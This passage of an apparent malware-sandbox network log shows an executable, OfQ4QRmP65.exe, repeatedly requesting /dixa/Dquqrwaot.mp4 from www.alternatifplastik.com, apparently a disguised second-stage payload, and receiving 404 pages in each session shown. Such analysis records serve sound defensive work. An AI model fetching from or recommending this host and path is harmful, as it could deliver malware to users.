                          2025-03-07 14:50:08 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          46192.168.2.11497525.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:10 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:11 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:09 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:11 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          47192.168.2.11497535.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:13 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:14 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:12 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:14 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          48192.168.2.11497545.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:16 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:17 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:15 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:17 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          49192.168.2.11497555.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:19 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:20 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:18 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:20 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          50192.168.2.11497565.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:22 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:23 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:21 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:23 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          51192.168.2.11497575.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:25 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:26 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:23 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:26 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          52192.168.2.11497585.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:28 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:28 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:26 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:28 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          53192.168.2.11497595.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:30 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:31 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:29 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:31 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          54192.168.2.11497605.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:34 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:34 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:32 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:34 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          55192.168.2.11497615.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:36 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:37 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:35 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:37 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          56192.168.2.11497625.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:39 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:40 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:37 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-03-07 14:50:40 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          57192.168.2.11497635.2.84.2364437112C:\Users\user\Desktop\OfQ4QRmP65.exe
                          TimestampBytes transferredDirectionData
                          2025-03-07 14:50:42 UTC194OUTGET /dixa/Dquqrwaot.mp4 HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                          Host: www.alternatifplastik.com
                          2025-03-07 14:50:43 UTC415INHTTP/1.1 404 Not Found
                          Connection: close
                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                          pragma: no-cache
                          content-type: text/html
                          content-length: 708
                          date: Fri, 07 Mar 2025 14:50:40 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
